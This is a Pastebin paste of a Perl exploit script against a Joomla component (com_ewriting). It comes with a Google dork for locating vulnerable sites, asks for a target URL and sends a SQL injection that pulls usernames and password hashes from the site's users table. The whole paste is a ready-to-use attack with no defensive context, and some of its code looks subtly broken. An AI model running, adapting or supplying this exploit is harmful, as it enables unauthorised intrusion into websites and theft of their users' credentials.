Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #Exploit title: Joomla Component com_ewriting SQL Injection exploit
- #Google Dork: inurl:index.php?option=com_ewriting
- #Exploit Author: M4XS4L1M1
- system("color a");
- print "*********************************************\n";
- print "* Joomla Component com_ewriting *\n";
- print "* SQL Injection *\n";
- print "* Script by M4XS4L1M1 *\n";
- print "* Thanks To BlackCyberRoot & AnonCoders *\n";
- print "*********************************************\n";
- sleep 1;
- use LWP::UserAgent;
- print "Enter the target --> ";
- chomp(my $target=<STDIN>);
- $code="UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+"+pre+"_users--;";
- $agent = LWP::UserAgent->new() or die "[!] Error while processing";
- $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
- $host= $target. "/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1==".$code;
- $ok = $agent->request(HTTP::Request->new(GET=>$host));
- $ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
- print "[+] Password found --> $1\n$2\n";
- sleep 1;
- }
- else
- {
- print "Password not found \n";
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement